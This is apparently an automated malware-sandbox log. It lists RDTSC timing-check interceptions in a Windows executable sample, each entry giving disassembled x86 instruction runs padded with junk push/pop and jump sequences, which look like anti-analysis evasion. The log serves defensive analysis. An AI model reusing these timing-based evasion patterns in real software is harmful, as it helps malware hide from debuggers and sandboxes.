Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B82E second address: F0B861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF340810308h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF3408102FAh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B861 second address: F0B88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB15h 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FF34080AB06h 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007FF34080AB06h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79AE2 second address: F79AEF instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79AEF second address: F79AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79AF6 second address: F79B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3408102FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791E3 second address: F791EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791EB second address: F791EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791EF second address: F791F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F791F5 second address: F791FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F793A1 second address: F793BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB15h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F793BA second address: F793D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF3408102FAh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FF3408102F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79512 second address: F79516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F79516 second address: F7951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7968A second address: F79692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7E7D5 second address: F7E7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7E90A second address: F7E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83B95 second address: F83B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83B99 second address: F83BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF34080AB06h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83BA7 second address: F83BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82885 second address: F82889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EB3 second address: F82EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EB7 second address: F82EC1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EC1 second address: F82EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EC5 second address: F82EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007FF34080AB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF34080AB0Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F82EE6 second address: F82EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83618 second address: F83629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB0Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F83629 second address: F8363F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF340810301h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F837AE second address: F837B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F837B4 second address: F837B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F837B8 second address: F837E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 jnc 00007FF34080AB06h 0x00000017 jmp 00007FF34080AB0Ch 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jc 00007FF34080AB06h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F870F7 second address: F87106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B871 second address: F8B875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B875 second address: F8B881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B881 second address: F8B886 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B886 second address: F8B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810308h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8B8A9 second address: F8B8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FF34080AB15h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8BA4A second address: F8BA5C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF3408102F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF3408102F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C25A second address: F8C25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C25E second address: F8C28A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 jmp 00007FF340810306h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C43C second address: F8C455 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB08h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF34080AB0Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C455 second address: F8C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8C708 second address: F8C716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF34080AB06h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F39077 second address: F3909A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF340810302h 0x0000000c jmp 00007FF3408102FCh 0x00000011 popad 0x00000012 jnp 00007FF34081031Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F3909A second address: F3909E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0D299 second address: F0D29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0D29D second address: F0D2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0D2B1 second address: F0D2B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F8CB2C second address: F8CB3F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF34080AB08h 0x00000008 pushad 0x00000009 jnp 00007FF34080AB06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93169 second address: F9316D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9316D second address: F93181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF34080AB0Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F92958 second address: F9295C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9295C second address: F92965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F92965 second address: F9296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F936E4 second address: F93712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FF34080AB19h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93712 second address: F93716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93837 second address: F93849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F93849 second address: F9384E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F986F1 second address: F986FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E344 second address: F38539 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FF340810308h 0x00000013 call 00007FF3408102FBh 0x00000018 mov edx, dword ptr [ebp+122D2C86h] 0x0000001e pop edx 0x0000001f pop ecx 0x00000020 lea eax, dword ptr [ebp+12493071h] 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push eax 0x00000041 push edi 0x00000042 pushad 0x00000043 jmp 00007FF3408102FDh 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b pop edi 0x0000004c mov dword ptr [esp], eax 0x0000004f xor dword ptr [ebp+122D3552h], esi 0x00000055 call dword ptr [ebp+122D1CC0h] 0x0000005b push eax 0x0000005c ja 00007FF340810325h 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 jmp 00007FF340810305h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E820 second address: F5E824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E824 second address: F5E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E8FE second address: F5E919 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF34080AB11h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5E919 second address: F5E91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5EB76 second address: F5EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5EB7C second address: F5EBA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e movsx edi, si 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007FF3408102F6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5ED01 second address: F5ED0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5ED0B second address: F5ED0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5EE4D second address: F5EE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5F570 second address: F5F574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5F62F second address: F5F633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5F633 second address: F39077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF3408102F8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12493071h] 0x0000002a nop 0x0000002b jmp 00007FF340810301h 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007FF3408102FCh 0x00000038 jc 00007FF3408102F6h 0x0000003e pop edx 0x0000003f nop 0x00000040 jmp 00007FF340810306h 0x00000045 call dword ptr [ebp+122D1C2Bh] 0x0000004b pushad 0x0000004c jmp 00007FF3408102FDh 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B34 second address: F97B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B3A second address: F97B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B42 second address: F97B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF34080AB06h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97B53 second address: F97B71 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3408102F6h 0x00000008 jo 00007FF3408102F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FF340810302h 0x00000016 jnc 00007FF3408102F6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97CBA second address: F97CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97CCC second address: F97CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F97CD2 second address: F97CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF34080AB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F98127 second address: F98144 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF3408102FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F98144 second address: F9814A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F982AB second address: F982AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F982AF second address: F982C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF34080AB0Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F982C8 second address: F982E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF340810301h 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9C0AF second address: F9C0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9C0B8 second address: F9C0CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF3408102FCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9C0CD second address: F9C0D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA010E second address: FA0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA0112 second address: FA011B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F1C3D1 second address: F1C3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF3408102FEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F1C3F4 second address: F1C3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9FBB9 second address: F9FBC3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF3408102FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
